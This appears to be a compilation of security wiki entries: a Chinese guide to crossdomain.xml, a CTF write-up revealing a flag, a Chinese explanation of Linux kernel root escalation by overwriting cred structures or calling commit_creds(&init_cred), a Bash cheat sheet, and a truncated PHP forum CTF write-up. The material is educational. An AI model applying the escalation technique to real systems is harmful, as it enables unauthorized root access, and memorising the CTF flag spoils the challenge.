*cross-domain-policy* cross-domain-policy 元素是跨域策略文件 `crossdomain.xml` 的根元素。它只是一个策略定义的容器,没有自己的属性。子元素有: - `site-control` - `allow-access-from` - `allow-access-from-identity` - `allow-http-request-headers-from` - *site-control* site-control 元素用于定义当前域的元策略。元策略则是用于指定可接受的域策略文件,且该文件不同于目标域根元素(名为`crossdomain.xml`)中的主策略文件。 如果客户端收到指示使用主策略文件以外的策略文件,则该客户端必须首先检查主策略的元策略,以确定请求的策略文件是否获得许可。 属性: - `permitted-cross-domain-policies` 指定元策略。除套接字策略文件外,所有策略文件的默认值均为 master-only,套接字策略文件的默认值为 all。该属性允许的值有: - none:目标服务器上的任何位置(包括该主策略文件)均不允许使用策略文件。 - master-only:仅允许这个主策略文件。 - by-content-type:仅允许 `Content-Type:text/x-cross-domain-policy` 提供的策略文件(只适用于 HTTP/HTTPS)。 - by-ftp-filename:仅允许文件名为 `crossdomain.xml` 的策略文件。(只适用于 FTP) - all:允许此目标域中所有的策略文件。 - *allow-access-from* allow-access-from 元素用于授权发出请求的域从目标域中读取数据。可以通过使用通配符(*),为多个域设置访问权限。 属性: - `domain` :指定要授予访问权限的发出请求的域。可以是域名或 IP 地址。子域将被视为不同的域。指定域时可以使用通配符星号( * )表示多个域。单独使用星号( * )表示所有域。一般不建议设置为星号允许所有域访问。 - `to-ports` :只适用于 Sockets,以逗号分隔的端口列表,或者允许连接到套接字连接的一系列端口。端口范围通过在两个端口号之间插入短划线 (-) 指定。端口范围在用逗号隔开时则可以用于指代单个端口。一个通配符 (*) 可用于表示允许所有端口。 - `secure` :只只适用于 HTTPS 和 Sockets,指定仅授予指定来源的 HTTPS 文档的访问权限 (true),还是授予指定来源的所有文档的访问权限 (false)。如果 HTTPS 策略文件中未指定 secure,则默认为 true。不建议在 HTTPS 策略文件中使用 false,因为这会影响 HTTPS 的安全性。在套接字策略文件中,默认值为 false。只有当套接字服务器接受本地主机连接时,指定 secure=”true” 才有意义,因为本地套接字连接通常不会面临中间人攻击的风险,因此无法更改 `secure=”true”` 声明。 - *allow-access-from-identity* allow-access-from-identity 元素根据加密凭据授予权限,而 allow-access-from 则截然不同,它根据来源授予权限。 - *allow-http-request-headers-from* allow-http-request-headers-from 元素用于授权发出请求的域中的请求文档将用户定义的标头发送到目标域。而 allow-access-from 元素旨在授权从目标域提取数据。这个标签授权以标头的形式推送数据。 属性: - `domain` :指定要授予访问权限的的域。可以是域名,也可以是 IP 地址,子域将被视为不同的域。通配符 (*) 单独使用时可用于表示所有域,在用作以句点 (.) 分隔的明确二级域名前缀时表示多个域。表示单个域时需要使用单独的 allow-access-from 元素。 - `headers` :以逗号分隔的标头列表,表示允许发送的请求域。通配符 (*) 可用于准许所有标头或头后缀,从而支持以相同字符开头但以不同字符结尾的标头。 - `secure` :只适用于 HTTPS,如果设置为 false,则表示允许 HTTPS 策略文件授权访问 HTTP 源发出的请求。默认值为 true,表示仅提供 HTTPS 源权限。我们不推荐使用 false。 **匹配规则** - 各个域或子域必须完全匹配。如 www.example.com 匹配 http://www.example.com。 - IP 地址和域名不匹配,即使 IP 地址就是域名指代的 IP 也不行。 - 域通配符与该域本身及所有子域匹配。 - 单独使用通配符 (*) 允许所有请求者进行访问,但不推荐使用。只有在策略文件范围内的所有内容完全公开的情况下才应当使用允许所有权限。 **示例文件** ``` <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only"/> <!-- 允许example.com及其子域访问 --> <allow-access-from domain="*.example.com"/> <!-- 允许http://www.example.com访问 --> <allow-access-from domain="www.example.com"/> <allow-http-request-headers-from domain="*.csdn.net" headers="*"/> </cross-domain-policy> ``` --- **Source & Reference** - [HTTP content-type](https://www.runoob.com/http/http-content-type.html)
sec-knowleage
# Ad Category: Ad ## Description > We interrupt this program for a commercial break > > https://www.youtube.com/watch?v=QzFuwljOj8Y ## Solution The attached YouTube video is a promotional video about the CTF. However, at 00:17, you can spot a long string flashing for a split second: ![](images/ad.png) Apparently this is a flag: CTF{9e796ca74932912c216a1cd00c25c84fae00e139}
sec-knowleage
# Change Self 内核会通过进程的 `task_struct` 结构体中的 cred 指针来索引 cred 结构体,然后根据 cred 的内容来判断一个进程拥有的权限,如果 cred 结构体成员中的 uid-fsgid 都为 0,那一般就会认为进程具有 root 权限。 ```c struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; /* number of processes subscribed */ void *put_addr; unsigned magic; #define CRED_MAGIC 0x43736564 #define CRED_MAGIC_DEAD 0x44656144 #endif kuid_t uid; /* real UID of the task */ kgid_t gid; /* real GID of the task */ kuid_t suid; /* saved UID of the task */ kgid_t sgid; /* saved GID of the task */ kuid_t euid; /* effective UID of the task */ kgid_t egid; /* effective GID of the task */ kuid_t fsuid; /* UID for VFS ops */ kgid_t fsgid; /* GID for VFS ops */ ... } ``` 因此,思路就比较直观了,我们可以通过以下方式来提权 - 直接修改 cred 结构体的内容 - 修改 task_struct 结构体中的 cred 指针指向一个满足要求的 cred 无论是哪一种方法,一般都分为两步:定位,修改。这就好比把大象放到冰箱里一样。 ## 直接改 cred ### 定位具体位置 我们可以首先获取到 cred 的具体地址,然后修改 cred。 #### 定位 定位 cred 的具体地址有很多种方法,这里根据是否直接定位分为以下两种 ##### 直接定位 cred 结构体的最前面记录了各种 id 信息,对于一个普通的进程而言,uid-fsgid 都是执行进程的用户的身份。因此我们可以通过扫描内存来定位 cred。 ```c struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; /* number of processes subscribed */ void *put_addr; unsigned magic; #define CRED_MAGIC 0x43736564 #define CRED_MAGIC_DEAD 0x44656144 #endif kuid_t uid; /* real UID of the task */ kgid_t gid; /* real GID of the task */ kuid_t suid; /* saved UID of the task */ kgid_t sgid; /* saved GID of the task */ kuid_t euid; /* effective UID of the task */ kgid_t egid; /* effective GID of the task */ kuid_t fsuid; /* UID for VFS ops */ kgid_t fsgid; /* GID for VFS ops */ ... } ``` **在实际定位的过程中,我们可能会发现很多满足要求的 cred,这主要是因为 cred 结构体可能会被拷贝、释放。**一个很直观的想法是在定位的过程中,利用 usage 不为 0 来筛除掉一些 cred,但仍然会发现一些 usage 为 0 的 cred。这是因为 cred 从 usage 为 0, 到释放有一定的时间。此外,cred 是使用 rcu 延迟释放的。 ##### 间接定位 ###### task_struct 进程的 `task_struct` 结构体中会存放指向 cred 的指针,因此我们可以 1. 定位当前进程 `task_struct` 结构体的地址 2. 根据 cred 指针相对于 task_struct 结构体的偏移计算得出 `cred` 指针存储的地址 3. 获取 `cred` 具体的地址 ###### comm comm 用来标记可执行文件的名字,位于进程的 `task_struct` 结构体中。我们可以发现 comm 其实在 cred 的正下方,所以我们也可以先定位 comm ,然后定位 cred 的地址。 ```c /* Process credentials: */ /* Tracer's credentials at attach: */ const struct cred __rcu *ptracer_cred; /* Objective and real subjective task credentials (COW): */ const struct cred __rcu *real_cred; /* Effective (overridable) subjective task credentials (COW): */ const struct cred __rcu *cred; #ifdef CONFIG_KEYS /* Cached requested key. */ struct key *cached_requested_key; #endif /* * executable name, excluding path. * * - normally initialized setup_new_exec() * - access it with [gs]et_task_comm() * - lock it with task_lock() */ char comm[TASK_COMM_LEN]; ``` 然而,在进程名字并不特殊的情况下,内核中可能会有多个同样的字符串,这会影响搜索的正确性与效率。因此,我们可以使用 prctl 设置进程的 comm 为一个特殊的字符串,然后再开始定位 comm。 #### 修改 在这种方法下,我们可以直接将 cred 中的 uid-fsgid 都修改为 0。当然修改的方式有很多种,比如说 - 在我们具有任意地址读写后,可以直接修改 cred。 - 在我们可以 ROP 执行代码后,可以利用 ROP gadget 修改 cred。 ### 间接定位 虽然我们确实想要修改 cred 的内容,但是不一定非得知道 cred 的具体位置,我们只需要能够修改 cred 即可。 #### (已过时)UAF 使用同样堆块 如果我们在进程初始化时能控制 cred 结构体的位置,并且我们可以在初始化后修改该部分的内容,那么我们就可以很容易地达到提权的目的。这里给出一个典型的例子 1. 申请一块与 cred 结构体大小一样的堆块 2. 释放该堆块 3. fork 出新进程,恰好使用刚刚释放的堆块 4. 此时,修改 cred 结构体特定内存,从而提权 但是**此种方法在较新版本内核中已不再可行,我们已无法直接分配到 cred\_jar 中的 object**,这是因为 cred\_jar 在创建时设置了 `SLAB_ACCOUNT` 标记,在 `CONFIG_MEMCG_KMEM=y` 时(默认开启)**cred\_jar 不会再与相同大小的 kmalloc-192 进行合并** ```c void __init cred_init(void) { /* allocate a slab in which we can store credentials */ cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred), 0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, NULL); } ``` ## 修改 cred 指针 ### 定位具体位置 在这种方式下,我们需要知道 cred 指针的具体地址。 #### 定位 ##### 直接定位 显然,cred 指针并没有什么非常特殊的地方,所以很难通过直接定位的方式定位到 cred 指针。 ##### 间接定位 ###### task_struct 进程的 `task_struct` 结构体中会存放指向 cred 的指针,因此我们可以 1. 定位当前进程 `task_struct` 结构体的地址 2. 根据 cred 指针相对于 task_struct 结构体的偏移计算得出 `cred` 指针存储的地址 ###### common comm 用来标记可执行文件的名字,位于进程的 `task_struct` 结构体中。我们可以发现 comm 其实在 cred 指针的正下方,所以我们也可以先定位 comm ,然后定位 cred 指针的地址。 ```c /* Process credentials: */ /* Tracer's credentials at attach: */ const struct cred __rcu *ptracer_cred; /* Objective and real subjective task credentials (COW): */ const struct cred __rcu *real_cred; /* Effective (overridable) subjective task credentials (COW): */ const struct cred __rcu *cred; #ifdef CONFIG_KEYS /* Cached requested key. */ struct key *cached_requested_key; #endif /* * executable name, excluding path. * * - normally initialized setup_new_exec() * - access it with [gs]et_task_comm() * - lock it with task_lock() */ char comm[TASK_COMM_LEN]; ``` 然而,在进程名字并不特殊的情况下,内核中可能会有多个同样的字符串,这会影响搜索的正确性与效率。因此,我们可以使用 prctl 设置进程的 comm 为一个特殊的字符串,然后再开始定位 comm。 #### 修改 在具体修改时,我们可以使用如下的两种方式 - 修改 cred 指针为内核镜像中已有的 init_cred 的地址。这种方法适合于我们能够直接修改 cred 指针以及知道 init_cred 地址的情况。 - 伪造一个 cred,然后修改 cred 指针指向该地址即可。这种方式比较麻烦,一般并不使用。 ### 间接定位 #### commit_creds(&init_cred) `commit_creds()` 函数被用以将一个新的 cred 设为当前进程 task_struct 的 real_cred 与 cred 字段,因此若是我们能够劫持内核执行流调用该函数并传入一个具有 root 权限的 cred,则能直接完成对当前进程的提权工作: ```c int commit_creds(struct cred *new) { struct task_struct *task = current;//内核宏,用以从 percpu 段获取当前进程的 PCB const struct cred *old = task->real_cred; //... rcu_assign_pointer(task->real_cred, new); rcu_assign_pointer(task->cred, new); ``` 在内核初始化过程当中会以 root 权限启动 `init` 进程,其 cred 结构体为**静态定义**的 `init_cred`,由此不难想到的是我们可以通过 `commit_creds(&init_cred)` 来完成提权的工作 ```c /* * The initial credentials for the initial task */ struct cred init_cred = { .usage = ATOMIC_INIT(4), #ifdef CONFIG_DEBUG_CREDENTIALS .subscribers = ATOMIC_INIT(2), .magic = CRED_MAGIC, #endif .uid = GLOBAL_ROOT_UID, .gid = GLOBAL_ROOT_GID, .suid = GLOBAL_ROOT_UID, .sgid = GLOBAL_ROOT_GID, .euid = GLOBAL_ROOT_UID, .egid = GLOBAL_ROOT_GID, .fsuid = GLOBAL_ROOT_UID, .fsgid = GLOBAL_ROOT_GID, .securebits = SECUREBITS_DEFAULT, .cap_inheritable = CAP_EMPTY_SET, .cap_permitted = CAP_FULL_SET, .cap_effective = CAP_FULL_SET, .cap_bset = CAP_FULL_SET, .user = INIT_USER, .user_ns = &init_user_ns, .group_info = &init_groups, .ucounts = &init_ucounts, }; ``` #### (已过时) commit_creds(prepare_kernel_cred(0)) 在内核当中提供了 `prepare_kernel_cred()` 函数用以拷贝指定进程的 cred 结构体,当我们传入的参数为 NULL 时,该函数会拷贝 `init_cred` 并返回一个有着 root 权限的 cred: ```c struct cred *prepare_kernel_cred(struct task_struct *daemon) { const struct cred *old; struct cred *new; new = kmem_cache_alloc(cred_jar, GFP_KERNEL); if (!new) return NULL; kdebug("prepare_kernel_cred() alloc %p", new); if (daemon) old = get_task_cred(daemon); else old = get_cred(&init_cred); ``` 我们不难想到的是若是我们可以在内核空间中调用 `commit_creds(prepare_kernel_cred(NULL))`,则也能直接完成提权的工作 不过自从内核版本 6.2 起,`prepare_kernel_cred(NULL)` 将**不再拷贝 init\_cred,而是将其视为一个运行时错误并返回 NULL**,这使得这种提权方法无法再应用于 6.2 及更高版本的内核: ```c struct cred *prepare_kernel_cred(struct task_struct *daemon) { const struct cred *old; struct cred *new; if (WARN_ON_ONCE(!daemon)) return NULL; new = kmem_cache_alloc(cred_jar, GFP_KERNEL); if (!new) return NULL; ```
sec-knowleage
--- title: Bash date: 2020-11-25 18:28:43 background: bg-[#3e4548] tags: - shell - sh - echo - script - linux categories: - Programming intro: This is a quick reference cheat sheet to getting started with linux bash shell scripting. plugins: - copyCode --- Getting Started --------------- ### hello.sh ```bash #!/bin/bash VAR="world" echo "Hello $VAR!" # => Hello world! ``` Execute the script ```shell script $ bash hello.sh ``` ### Variables ```bash NAME="John" echo ${NAME} # => John (Variables) echo $NAME # => John (Variables) echo "$NAME" # => John (Variables) echo '$NAME' # => $NAME (Exact string) echo "${NAME}!" # => John! (Variables) NAME = "John" # => Error (about space) ``` ### Comments ```bash # This is an inline Bash comment. ``` ```bash : ' This is a very neat comment in bash ' ``` Multi-line comments use `:'` to open and `'` to close ### Arguments {.row-span-2} | Expression | Description | |-------------|---------------------------------------| | `$1` … `$9` | Parameter 1 ... 9 | | `$0` | Name of the script itself | | `$1` | First argument | | `${10}` | Positional parameter 10 | | `$#` | Number of arguments | | `$$` | Process id of the shell | | `$*` | All arguments | | `$@` | All arguments, starting from first | | `$-` | Current options | | `$_` | Last argument of the previous command | See: [Special parameters](http://wiki.bash-hackers.org/syntax/shellvars#special_parameters_and_shell_variables) ### Functions ```bash get_name() { echo "John" } echo "You are $(get_name)" ``` See: [Functions](#bash-functions) ### Conditionals {#conditionals-example} ```bash if [[ -z "$string" ]]; then echo "String is empty" elif [[ -n "$string" ]]; then echo "String is not empty" fi ``` See: [Conditionals](#bash-conditionals) ### Brace expansion ```bash echo {A,B}.js ``` --- | Expression | Description | |------------|---------------------| | `{A,B}` | Same as `A B` | | `{A,B}.js` | Same as `A.js B.js` | | `{1..5}` | Same as `1 2 3 4 5` | See: [Brace expansion](http://wiki.bash-hackers.org/syntax/expansion/brace) ### Shell execution ```bash # => I'm in /path/of/current echo "I'm in $(PWD)" # Same as: echo "I'm in `pwd`" ``` See: [Command substitution](http://wiki.bash-hackers.org/syntax/expansion/cmdsubst) Bash Parameter expansions -------------------- ### Syntax {.row-span-2} | Code | Description | |-------------------|---------------------| | `${FOO%suffix}` | Remove suffix | | `${FOO#prefix}` | Remove prefix | | `${FOO%%suffix}` | Remove long suffix | | `${FOO##prefix}` | Remove long prefix | | `${FOO/from/to}` | Replace first match | | `${FOO//from/to}` | Replace all | | `${FOO/%from/to}` | Replace suffix | | `${FOO/#from/to}` | Replace prefix | #### Substrings | Expression | Description | |-----------------|--------------------------------| | `${FOO:0:3}` | Substring _(position, length)_ | | `${FOO:(-3):3}` | Substring from the right | #### Length | Expression | Description | |------------|------------------| | `${#FOO}` | Length of `$FOO` | #### Default values | Expression | Description | |-------------------|------------------------------------------| | `${FOO:-val}` | `$FOO`, or `val` if unset | | `${FOO:=val}` | Set `$FOO` to `val` if unset | | `${FOO:+val}` | `val` if `$FOO` is set | | `${FOO:?message}` | Show message and exit if `$FOO` is unset | ### Substitution ```bash echo ${food:-Cake} #=> $food or "Cake" ``` ```bash STR="/path/to/foo.cpp" echo ${STR%.cpp} # /path/to/foo echo ${STR%.cpp}.o # /path/to/foo.o echo ${STR%/*} # /path/to echo ${STR##*.} # cpp (extension) echo ${STR##*/} # foo.cpp (basepath) echo ${STR#*/} # path/to/foo.cpp echo ${STR##*/} # foo.cpp echo ${STR/foo/bar} # /path/to/bar.cpp ``` ### Slicing ```bash name="John" echo ${name} # => John echo ${name:0:2} # => Jo echo ${name::2} # => Jo echo ${name::-1} # => Joh echo ${name:(-1)} # => n echo ${name:(-2)} # => hn echo ${name:(-2):2} # => hn length=2 echo ${name:0:length} # => Jo ``` See: [Parameter expansion](http://wiki.bash-hackers.org/syntax/pe) ### basepath & dirpath ```bash SRC="/path/to/foo.cpp" ``` ```bash BASEPATH=${SRC##*/} echo $BASEPATH # => "foo.cpp" DIRPATH=${SRC%$BASEPATH} echo $DIRPATH # => "/path/to/" ``` ### Transform ```bash STR="HELLO WORLD!" echo ${STR,} # => hELLO WORLD! echo ${STR,,} # => hello world! STR="hello world!" echo ${STR^} # => Hello world! echo ${STR^^} # => HELLO WORLD! ARR=(hello World) echo "${ARR[@],}" # => hello world echo "${ARR[@]^}" # => Hello World ``` Bash Arrays ------ ### Defining arrays ```bash Fruits=('Apple' 'Banana' 'Orange') Fruits[0]="Apple" Fruits[1]="Banana" Fruits[2]="Orange" ARRAY1=(foo{1..2}) # => foo1 foo2 ARRAY2=({A..D}) # => A B C D # Merge => foo1 foo2 A B C D ARRAY3=(${ARRAY1[@]} ${ARRAY2[@]}) # declare construct declare -a Numbers=(1 2 3) Numbers+=(4 5) # Append => 1 2 3 4 5 ``` ### Indexing | - | - | |--------------------|---------------| | `${Fruits[0]}` | First element | | `${Fruits[-1]}` | Last element | | `${Fruits[*]}` | All elements | | `${Fruits[@]}` | All elements | | `${#Fruits[@]}` | Number of all | | `${#Fruits}` | Length of 1st | | `${#Fruits[3]}` | Length of nth | | `${Fruits[@]:3:2}` | Range | | `${!Fruits[@]}` | Keys of all | ### Iteration ```bash Fruits=('Apple' 'Banana' 'Orange') for e in "${Fruits[@]}"; do echo $e done ``` #### With index ```bash for i in "${!Fruits[@]}"; do printf "%s\t%s\n" "$i" "${Fruits[$i]}" done ``` ### Operations {.col-span-2} ```bash Fruits=("${Fruits[@]}" "Watermelon") # Push Fruits+=('Watermelon') # Also Push Fruits=( ${Fruits[@]/Ap*/} ) # Remove by regex match unset Fruits[2] # Remove one item Fruits=("${Fruits[@]}") # Duplicate Fruits=("${Fruits[@]}" "${Veggies[@]}") # Concatenate lines=(`cat "logfile"`) # Read from file ``` ### Arrays as arguments ```bash function extract() { local -n myarray=$1 local idx=$2 echo "${myarray[$idx]}" } Fruits=('Apple' 'Banana' 'Orange') extract Fruits 2 # => Orangle ``` Bash Dictionaries ------------ ### Defining ```bash declare -A sounds ``` ```bash sounds[dog]="bark" sounds[cow]="moo" sounds[bird]="tweet" sounds[wolf]="howl" ``` ### Working with dictionaries ```bash echo ${sounds[dog]} # Dog's sound echo ${sounds[@]} # All values echo ${!sounds[@]} # All keys echo ${#sounds[@]} # Number of elements unset sounds[dog] # Delete dog ``` ### Iteration ```bash for val in "${sounds[@]}"; do echo $val done ``` --- ```bash for key in "${!sounds[@]}"; do echo $key done ``` Bash Conditionals ------------ ### Integer conditions | Condition | Description | |---------------------|---------------------------------------------| | `[[ NUM -eq NUM ]]` | <yel>Eq</yel>ual | | `[[ NUM -ne NUM ]]` | <yel>N</yel>ot <yel>e</yel>qual | | `[[ NUM -lt NUM ]]` | <yel>L</yel>ess <yel>t</yel>han | | `[[ NUM -le NUM ]]` | <yel>L</yel>ess than or <yel>e</yel>qual | | `[[ NUM -gt NUM ]]` | <yel>G</yel>reater <yel>t</yel>han | | `[[ NUM -ge NUM ]]` | <yel>G</yel>reater than or <yel>e</yel>qual | | `(( NUM < NUM ))` | Less than | | `(( NUM <= NUM ))` | Less than or equal | | `(( NUM > NUM ))` | Greater than | | `(( NUM >= NUM ))` | Greater than or equal | ### String conditions | Condition | Description | |--------------------|-----------------------------| | `[[ -z STR ]]` | Empty string | | `[[ -n STR ]]` | <yel>N</yel>ot empty string | | `[[ STR == STR ]]` | Equal | | `[[ STR = STR ]]` | Equal (Same above) | | `[[ STR < STR ]]` | Less than _(ASCII)_ | | `[[ STR > STR ]]` | Greater than _(ASCII)_ | | `[[ STR != STR ]]` | Not Equal | | `[[ STR =~ STR ]]` | Regexp | ### Example {.row-span-3} #### String ```bash if [[ -z "$string" ]]; then echo "String is empty" elif [[ -n "$string" ]]; then echo "String is not empty" else echo "This never happens" fi ``` #### Combinations ```bash if [[ X && Y ]]; then ... fi ``` #### Equal ```bash if [[ "$A" == "$B" ]]; then ... fi ``` #### Regex ```bash if [[ '1. abc' =~ ([a-z]+) ]]; then echo ${BASH_REMATCH[1]} fi ``` #### Smaller ```bash if (( $a < $b )); then echo "$a is smaller than $b" fi ``` #### Exists ```bash if [[ -e "file.txt" ]]; then echo "file exists" fi ``` ### File conditions {.row-span-2} | Condition | Description | |-------------------|----------------------------------------| | `[[ -e FILE ]]` | <yel>E</yel>xists | | `[[ -d FILE ]]` | <yel>D</yel>irectory | | `[[ -f FILE ]]` | <yel>F</yel>ile | | `[[ -h FILE ]]` | Symlink | | `[[ -s FILE ]]` | Size is > 0 bytes | | `[[ -r FILE ]]` | <yel>R</yel>eadable | | `[[ -w FILE ]]` | <yel>W</yel>ritable | | `[[ -x FILE ]]` | Executable | | `[[ f1 -nt f2 ]]` | f1 <yel>n</yel>ewer <yel>t</yel>han f2 | | `[[ f1 -ot f2 ]]` | f2 <yel>o</yel>lder <yel>t</yel>han f1 | | `[[ f1 -ef f2 ]]` | Same files | ### More conditions | Condition | Description | |----------------------|----------------------| | `[[ -o noclobber ]]` | If OPTION is enabled | | `[[ ! EXPR ]]` | Not | | `[[ X && Y ]]` | And | | `[[ X || Y ]]` | Or | ### logical and, or ```bash if [ "$1" = 'y' -a $2 -gt 0 ]; then echo "yes" fi if [ "$1" = 'n' -o $2 -lt 0 ]; then echo "no" fi ``` Bash Loops ----- ### Basic for loop ```bash for i in /etc/rc.*; do echo $i done ``` ### C-like for loop ```bash for ((i = 0 ; i < 100 ; i++)); do echo $i done ``` ### Ranges {.row-span-2} ```bash for i in {1..5}; do echo "Welcome $i" done ``` #### With step size ```bash for i in {5..50..5}; do echo "Welcome $i" done ``` ### Auto increment ```bash i=1 while [[ $i -lt 4 ]]; do echo "Number: $i" ((i++)) done ``` ### Auto decrement ```bash i=3 while [[ $i -gt 0 ]]; do echo "Number: $i" ((i--)) done ``` ### Continue ```bash {data=3,5} for number in $(seq 1 3); do if [[ $number == 2 ]]; then continue; fi echo "$number" done ``` ### Break ```bash for number in $(seq 1 3); do if [[ $number == 2 ]]; then # Skip entire rest of loop. break; fi # This will only print 1 echo "$number" done ``` ### Until ```bash count=0 until [ $count -gt 10 ]; do echo "$count" ((count++)) done ``` ### Forever ```bash while true; do # here is some code. done ``` ### Forever (shorthand) ```bash while :; do # here is some code. done ``` ### Reading lines ```bash cat file.txt | while read line; do echo $line done ``` Bash Functions --------- ### Defining functions ```bash myfunc() { echo "hello $1" } ``` ```bash # Same as above (alternate syntax) function myfunc() { echo "hello $1" } ``` ```bash myfunc "John" ``` ### Returning values ```bash myfunc() { local myresult='some value' echo $myresult } ``` ```bash result="$(myfunc)" ``` ### Raising errors ```bash myfunc() { return 1 } ``` ```bash if myfunc; then echo "success" else echo "failure" fi ``` Bash Options {.cols-2} ------- ### Options ```bash # Avoid overlay files # (echo "hi" > foo) set -o noclobber # Used to exit upon error # avoiding cascading errors set -o errexit # Unveils hidden failures set -o pipefail # Exposes unset variables set -o nounset ``` ### Glob options ```bash # Non-matching globs are removed # ('*.foo' => '') shopt -s nullglob # Non-matching globs throw errors shopt -s failglob # Case insensitive globs shopt -s nocaseglob # Wildcards match dotfiles # ("*.sh" => ".foo.sh") shopt -s dotglob # Allow ** for recursive matches # ('lib/**/*.rb' => 'lib/a/b/c.rb') shopt -s globstar ``` Bash History {.cols-2} ------- ### Commands | Command | Description | |-----------------------|-------------------------------------------| | `history` | Show history | | `sudo !!` | Run the previous command with sudo | | `shopt -s histverify` | Don't execute expanded result immediately | ### Expansions | Expression | Description | |--------------|------------------------------------------------------| | `!$` | Expand last parameter of most recent command | | `!*` | Expand all parameters of most recent command | | `!-n` | Expand `n`th most recent command | | `!n` | Expand `n`th command in history | | `!<command>` | Expand most recent invocation of command `<command>` | ### Operations | Code | Description | |----------------------|-----------------------------------------------------------------------| | `!!` | Execute last command again | | `!!:s/<FROM>/<TO>/` | Replace first occurrence of `<FROM>` to `<TO>` in most recent command | | `!!:gs/<FROM>/<TO>/` | Replace all occurrences of `<FROM>` to `<TO>` in most recent command | | `!$:t` | Expand only basename from last parameter of most recent command | | `!$:h` | Expand only directory from last parameter of most recent command | `!!` and `!$` can be replaced with any valid expansion. ### Slices | Code | Description | |----------|------------------------------------------------------------------------------------------| | `!!:n` | Expand only `n`th token from most recent command (command is `0`; first argument is `1`) | | `!^` | Expand first argument from most recent command | | `!$` | Expand last token from most recent command | | `!!:n-m` | Expand range of tokens from most recent command | | `!!:n-$` | Expand `n`th token to last from most recent command | `!!` can be replaced with any valid expansion i.e. `!cat`, `!-2`, `!42`, etc. Miscellaneous ------------- ### Numeric calculations ```bash $((a + 200)) # Add 200 to $a ``` ```bash $(($RANDOM%200)) # Random number 0..199 ``` ### Subshells ```bash (cd somedir; echo "I'm now in $PWD") pwd # still in first directory ``` ### Inspecting commands ```bash command -V cd #=> "cd is a function/alias/whatever" ``` ### Redirection {.row-span-2 .col-span-2} ```bash python hello.py > output.txt # stdout to (file) python hello.py >> output.txt # stdout to (file), append python hello.py 2> error.log # stderr to (file) python hello.py 2>&1 # stderr to stdout python hello.py 2>/dev/null # stderr to (null) python hello.py &>/dev/null # stdout and stderr to (null) ``` ```bash python hello.py < foo.txt # feed foo.txt to stdin for python ``` ### Source relative ```bash source "${0%/*}/../share/foo.sh" ``` ### Directory of script ```bash DIR="${0%/*}" ``` ### Case/switch ```bash case "$1" in start | up) vagrant up ;; *) echo "Usage: $0 {start|stop|ssh}" ;; esac ``` ### Trap errors {.col-span-2} ```bash trap 'echo Error at about $LINENO' ERR ``` or ```bash traperr() { echo "ERROR: ${BASH_SOURCE[1]} at about ${BASH_LINENO[0]}" } set -o errtrace trap traperr ERR ``` ### printf ```bash printf "Hello %s, I'm %s" Sven Olga #=> "Hello Sven, I'm Olga printf "1 + 1 = %d" 2 #=> "1 + 1 = 2" printf "Print a float: %f" 2 #=> "Print a float: 2.000000" ``` ### Getting options {.col-span-2} ```bash while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in -V | --version ) echo $version exit ;; -s | --string ) shift; string=$1 ;; -f | --flag ) flag=1 ;; esac; shift; done if [[ "$1" == '--' ]]; then shift; fi ``` ### Check for command's result {.col-span-2} ```bash if ping -c 1 google.com; then echo "It appears you have a working internet connection" fi ``` ### Special variables {.row-span-2} | Expression | Description | |------------|------------------------------| | `$?` | Exit status of last task | | `$!` | PID of last background task | | `$$` | PID of shell | | `$0` | Filename of the shell script | See [Special parameters](http://wiki.bash-hackers.org/syntax/shellvars#special_parameters_and_shell_variables). ### Grep check {.col-span-2} ```bash if grep -q 'foo' ~/.bash_history; then echo "You appear to have typed 'foo' in the past" fi ``` ### Backslash escapes {.row-span-2} - &nbsp; - \! - \" - \# - \& - \' - \( - \) - \, - \; - \< - \> - \[ - \| - \\ - \] - \^ - \{ - \} - \` - \$ - \* - \? {.cols-4 .marker-none} Escape these special characters with `\` ### Heredoc ```sh cat <<END hello world END ``` ### Go to previous directory ```bash pwd # /home/user/foo cd bar/ pwd # /home/user/foo/bar cd - pwd # /home/user/foo ``` ### Reading input ```bash echo -n "Proceed? [y/n]: " read ans echo $ans ``` ```bash read -n 1 ans # Just one character ``` ### Conditional execution ```bash git commit && git push git commit || echo "Commit failed" ``` ### Strict mode ```bash set -euo pipefail IFS=$'\n\t' ``` See: [Unofficial bash strict mode](http://redsymbol.net/articles/unofficial-bash-strict-mode/) ### Optional arguments ```bash args=("$@") args+=(foo) args+=(bar) echo "${args[@]}" ``` Put the arguments into an array and then append ## Also see {.cols-1} * [Devhints](https://devhints.io/bash) _(devhints.io)_ * [Bash-hackers wiki](http://wiki.bash-hackers.org/) _(bash-hackers.org)_ * [Shell vars](http://wiki.bash-hackers.org/syntax/shellvars) _(bash-hackers.org)_ * [Learn bash in y minutes](https://learnxinyminutes.com/docs/bash/) _(learnxinyminutes.com)_ * [Bash Guide](http://mywiki.wooledge.org/BashGuide) _(mywiki.wooledge.org)_ * [ShellCheck](https://www.shellcheck.net/) _(shellcheck.net)_ * [shell - Standard Shell](https://devmanual.gentoo.org/tools-reference/bash/index.html) _(devmanual.gentoo.org)_
sec-knowleage
# High School Project Category: Web Exploitation ## Description > Here's my high school project, an online forum. It's so good that people actually use it. You can join, too. Since I'm the admin, I can also post secret stuff that only I can read. How cool is that! ## Solution Visiting the attached website, we arrive to a forum with many categories and posts. The first category is called "Secrets" and is described as the "Admin's secret place". In the "Secrets" category, there's a topic titled "Flag". However, if we try to view it, we get an error: "Only an admin can view this topic". The forum allows users to sign up by selecting a username / password combination and entering their email. Later, they can sign in with their username and password. Another feature that the forum has is the ability to view the implementation sources (implemented in PHP). This is available via a link at the bottom of each page: `<a href="?src">Source</a>`. It's possible to append `"?src"` to any public PHP file and view its sources (including files which are included from within other files). We won't go over all the sources, let's just cover the logic related to signing up and logging in. In `signup.php`, after verifying various things about the username and password, we have: ```php $sql = "INSERT INTO users(user_name, user_pass, user_email ,user_date, user_level) VALUES('" . mysqli_real_escape_string($conn, $_POST['user_name']) . "', '" . sha1($_POST['user_pass']) . "', '" . mysqli_real_escape_string($conn, $_POST['user_email']) . "', NOW(), 0)"; $result = mysqli_query($conn 